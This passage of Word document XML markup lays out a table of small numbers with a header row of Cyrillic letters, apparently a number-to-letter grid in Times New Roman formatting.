                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="180"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>17</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40" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>5</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gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="20"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="480" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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w:t>
            </w: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19</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auto"/>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4</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28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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ind w:right="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>28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28</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11</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18</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23</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w w:val="79"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="20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8</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14</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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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23</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33</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80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>20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15</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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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23</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33</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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="20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2</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25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4</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33</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34</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18</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15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25</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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15</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22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25</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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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18</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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="100"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="80"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>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15</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23</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33</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19</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34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2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gridSpan w:val="3"/>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20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ind w:right="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>25</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10</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23</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14</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15</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21</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15</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80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="8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16</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="100"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>14</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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>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24</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20</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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>6</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auto"/>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228" w:lineRule="exact"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
              <w:t>11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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="160"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="20"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="480" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="160"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="100"/>
              <w:jc w:val="center"/>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4</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6</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ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>16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11</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0" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
              <w:t>8</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500" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="180"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>14</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10</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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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24</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20</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6</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10</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23</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28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18</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15</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3</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25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ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>18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11</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24</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20</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7</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10</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59"/>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4</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2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7</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20" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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15</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2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r>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="312"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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4"/>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3"/>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3"/>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3"/>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24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="278"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="96"/>
              </w:rPr>
              <w:t>А</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0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="90"/>
              </w:rPr>
              <w:t>Б</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В</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3"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="93"/>
              </w:rPr>
              <w:t>Г</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Д</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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Е</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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Ё</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0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="90"/>
              </w:rPr>
              <w:t>Ж</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4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="94"/>
              </w:rPr>
              <w:t>З</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И</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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Й</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="82"/>
              </w:rPr>
              <w:t>К</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0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
